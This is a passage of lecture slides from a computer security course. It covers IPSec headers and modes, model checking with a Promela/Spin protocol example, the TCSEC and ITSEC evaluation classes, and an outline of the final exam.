IPSec may be used in a range of ways.
IPSec VPN
[Figure: an IPSec VPN running across an ISP.]
IPSec point-to-point
IPSec network-to-network
IPSec headers
There are two types of header, one used for authentication, and the other used for encryption:
1. AH - the Authentication Header for data integrity, anti-replay and authentication
2. ESP - the Encapsulating Security Payload header, for confidentiality. ESP can also provide AH services.
Communicating parties agree on a Security Association (SA), one SA for each direction, and one SA for each type of communication.
Modes of operation
• An end-to-end SA - Transport mode
[Figure: transport mode packet layouts. AH: Original IPv6 hdr | AH | Transport segment, with the packet authenticated. ESP: Original IPv6 hdr | ESP | Transport segment | ESP, with the transport segment encrypted and the ESP portion authenticated.]
Modes of operation
• An SA between security gateways - Tunnel mode
[Figure: tunnel mode packet layouts. AH: New IPv6 hdr | AH | Original IPv6 hdr | Transport segment, with the packet authenticated. ESP: New IPv6 hdr | ESP | Original IPv6 hdr | Transport segment | ESP, with the original packet encrypted and the ESP portion authenticated.]
SAs form a kind of distributed database.
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Formal methods
FM encompasses a wide range of techniques...
Model checking: constructing formal models, with appropriate formal specifications.
Example is Promela and Spin.
Promela and spin
The language Promela is ’C’-like, with an initialization procedure. It can model asynchronous or synchronous, deterministic or non-deterministic systems.
Spin is the checker for Promela models.
Assertions to test correctness of the model:

    assert(some boolean condition);

If the condition is not TRUE then the assertion is violated.
Temporal claims
We got here again without making any progress!
The support for temporal claims takes the form of:
Endstate labels - for determining valid endstates
Progress labels - claim no non-progress cycles
Never claims - impossible temporal assertions
Simple example
[Figure: two nodes A and B linked by the channels AtoB and BtoA, each with its own application channels (Ain, Aout and Bin, Bout).]
Promela example

    init
    {
        chan AtoB = [1] of { mtype, byte };
        chan BtoA = [1] of { mtype, byte };
        chan Ain  = [2] of { mtype, byte };
        chan Bin  = [2] of { mtype, byte };
        chan Aout = [2] of { mtype, byte };
        chan Bout = [2] of { mtype, byte };
        atomic {
            run application( Ain, Aout );
            run transfer( Aout, Ain, BtoA, AtoB );
            run transfer( Bout, Bin, AtoB, BtoA );
            run application( Bin, Bout )
        };
        AtoB!err(0)
    }

Promela example

    #define MAX 10
    mtype = { ack, nak, err, next, accept }

    proctype transfer( chan in, out, chin, chout )
    {
        byte o, i;
        in?next(o);
        do
        :: chin?nak(i) -> out!accept(i); chout!ack(o)
        :: chin?ack(i) -> out!accept(i); in?next(o); chout!ack(o)
        :: chin?err(i) -> chout!nak(o)
        od
    }

Promela example

    proctype application( chan in, out )
    {
        int i=0, j=0, last_i=0;
        do
        :: in?accept(i) ->
            assert( i==last_i );
            if
            :: (last_i!=MAX) -> last_i = last_i+1
            :: (last_i==MAX)
            fi
        :: out!next(j) ->
            if
            :: (j!=MAX) -> j=j+1
            :: (j==MAX)
            fi
        od
    }
Spin simulation
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Formal evaluation - TCSEC
TCSEC (The Orange book) was the first rating system for the security of products. It defined six different evaluation classes. The classes are:
• C1 - For same-level security access. Not currently used.
• C2 - Controlled access protection - users are individually accountable for their actions. Most OS manufacturers have C2 versions of the OS.
• B1 - Mandatory BLP policies - for more secure systems handling classified data.
Formal evaluation - TCSEC
• B2 - structured protection - mandatory access control for all objects in the system. Formal models.
• B3 - security domains - more controls, minimal complexity, provable consistency of model.
• A1 - Verified design - consistency proofs between model and specification.
Formal evaluation - ITSEC
From Dutch, English, French and German national security evaluation criteria.
Adaptable.
Sponsor determines operational requirements, threats and security objectives.
ITSEC specifies the interactions and documents between the sponsor and the evaluator.
ITSEC
Again there are various levels of evaluation: E0..E6, with E6 giving the highest level of assurance - it requires two independent formal verifications.
First certification of a smart-card system under E6.
The smart-cards are electronic purses - that is, they carry value. Forgery must be impossible.
The certification encompassed the communication with the card, as well as the software within the card, and at the bank.
Data Diode E6, BLP
[Figure: a data diode between a high security network and a low security network.]
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Exam
You can expect 12 pages - write on paper. Marks/50.
10 short answer questions worth 1 mark each
Longer questions on...
Encryption, Information, Models, Key systems
Exam
Modulo, primes, Fermat, Euler: general & specific
Symmetric cryptosystems: IC, DES, general & specific
Physical limits: general
Information theory: general & security-specific
Models: BLP, Biba - general & specific
Key systems: RSA, Kerberos, specific
Dr Robert Deng
Real World Applications of Network/Computer Security
Abstract: The lecture is on practical applications of network and computer security technology. Examples include virtual private networks, security solutions for e-banking, fair exchange of digital valuables over the Internet (e.g., electronic contract signing over a network and certified e-mail delivery) and techniques for user privacy protection in cyberspace.
Finally
This is my last lecture, so...
Good luck with the exam, and
Thanks for your attention
Good luck!
Contents
1 Lecture 1 - Introduction
2 Lecture 2 - Preliminaries
3 Lecture 3 - Preliminaries
4 Lecture 4 - Preliminaries
5 Lecture 5 - Preliminaries
6 Lecture 6 - Errors
7 Lecture 7 - Encryption
8 Lecture 8 - Protocols
9 Lecture 9 - System (in)security
10 Lecture 10 - More (in)security
11 Lecture 11 - Security